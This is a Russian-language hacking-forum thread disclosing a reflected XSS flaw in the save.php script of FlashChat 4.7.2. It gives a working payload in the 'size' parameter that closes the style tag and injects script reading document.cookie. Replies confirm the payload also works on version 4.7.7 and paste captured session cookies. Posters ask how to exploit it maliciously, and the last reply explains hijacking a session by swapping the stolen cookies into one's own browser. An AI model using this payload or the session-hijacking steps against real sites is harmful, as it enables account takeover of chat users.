Форум АНТИЧАТ - FlashChat v 4.7.2

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - FlashChat v 4.7.2 (https://forum.antichat.xyz/showthread.php?t=32532)

FlashChat v 4.7.2

Пришлось мне потеститьFlashChat v 4.7.2
Сам движок написан неплохо, все входящие символы в окно чата фильтруються.

В чате имееться скрипт, который позволяет сохранить логи. При нажатии по кнопке Save образуеться ссылка вида

Цитата:

save.php?id=895a28e67c9b1533b0c0786b7a0706ce&font=Arial&size=13

По переменным font и size можно догадаться что это шрифт, и его размер. Глянем сорс

Код:

        

<style type="text/css">

<!--

BODY {

        font-family: Arial, Verdana, Arial, Helvetica, sans-serif;

        font-size: 13px;

}

-->

</style>

Значения переменных не фильтруються, и можно вставить любой код, закрыв тег <style>.
Вот xss:

Цитата:

save.php?font=Arial&size=13px;}--></style><script>alert(document.cookie)</script><!--

Теперь иходный код примет такой вид

Код:

        

<style type="text/css">

<!--

BODY {

        font-family: Arial, Verdana, Arial, Helvetica, sans-serif;

        font-size: 13px;}--></style><script>alert(document.cookie)</script><!--

}

-->

</style>

А вот и куки =)
html комментарий после скрипта нужен чтобы убрать со страници ненужные символы которые остались в скрипте

Работает, шаришь).

Как можно прикрыть ету уязвимость?И существует ли она в других версиях чата?

попробовал на версии 4.7.7

Цитата:

wbb2_cookiehash=05774aa8eb7642934e9bd942be4ccb79;
wbb2_lastvisit=1170701252;
PHPSESSID=dc09253337597b4c7b65d61b7ad7d3f1

походу тож работает :D

a kak panimat vot eta ?

Код:

357772|1082225=15931520|1; __utmz=125134932.1170512684.1.1.utmccn=(organic)|utmcsr=google|utmctr=taxi+4|utmcmd=organic; __utma=125134932.1436039616.1170512684.1170512684.1171122060.2; __utmc=125134932; __utmb=125134932

no chat nawerna ciutka perepisan

+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?

Цитата:

Сообщение от Dimon_Aka_Sexxx

+1
Ну и начерта нам наши же кукисы?)
Как это можно юзать в злостных целях ?

Жжош! Некогда не юзал чтоли подобные уязвимости?
Кури ЭТО. ;)

я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.

Цитата:

Сообщение от Витян

я никогда не юзал такие уязвимости....ну получил свои куки......знающие и гуру разъясните пожалуйста, что дальше.

Тебе же дали этот линк
дык читай... =\

Лучше один раз увидеть, чем сто раз услышать... Можно ли записать видео с использованием этой уязвимости? желательно вместе с снифером. Или подробно на словах обьяснить, как пользоваться. Раньше с Xss не работал, максимум баловался метасплоитом в сетке.

Цитата:

Сообщение от Apik

Лучше один раз увидеть, чем сто раз услышать.

По моему нет принципиальных отличий от других XSS, зачем писать видео?
Посмотри про использование пассивных XSS в других движках - меняется только ссылка с javascript'ом, если для тебя главное - посмотреть, как использовать сниффер - нет разницы.

Затем что я не работал никогда с Xss, и поэтому, хоть особых отличий нету, но все таки они будут, хоть малейшие. И чтобы не сидеть и не думать, что сделал не так, хотелось бы посмотреть видео, все доступно.

У меня вопросы: Я получил куки

ASPSESSIONIDACBSSTRR=HMHBOAGBNKLJCOGDHIPEPLHJ; PHPSESSID=e8rm1868slla2epr6neld77e55; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologini d%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3 A6%3A%22187271%22%3B%7D; phpbb2mysql_sid=0f6b9ca5120f0886135f849e4380209b

что теперь, как это расшифровать? и нужно ли это? подменить всмысле изменить сначала а потом пихнуть откуда взял - так что на что менять?

NiGHt-LEshiY
меняй у себя в бразуере свои куки на те , что получил